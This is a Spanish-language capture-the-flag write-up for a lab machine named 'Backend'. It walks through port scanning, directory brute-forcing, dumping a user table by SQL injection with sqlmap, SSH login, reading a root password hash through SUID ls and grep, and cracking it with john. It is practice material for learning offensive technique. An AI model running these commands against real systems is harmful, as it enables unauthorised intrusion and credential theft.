Backend

✍️ Autor: 4bytes🔍 Dificultad: Fácil 📅 Fecha de creación: 29/08/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea una página bajo desarrollo podemos ver que hay una pestaña de Login.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Probamos con credenciales básicas y con una inyección básica pero nada.

🚀 EXPLOTACIÓN

Vamos a probar con sqlmap para ver que bases de datos hay.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch --dbs

Ahora vemos el contenido de la base de datos users.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch -D users --tables

Ahora vemos el contenido de la tabla de usuarios.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch -D users -T usuarios --dump

Probamos con esas credenciales pero con pepe logramos loguearnos en SSH.

ssh pepe@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

Buscamos permisos SUID.

find / -perm -4000 2>/dev/null

Nos llama la atención ls y grep por lo que buscamos en esta página cómo explotarlo.

/usr/bin/ls -la /root
/usr/bin/grep '' /root/pass.hash

Vemos que es un hash en formato MD5 por lo que vamos a desencriptarlo.

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

Nos logueamos como root.

Last updated

Was this helpful?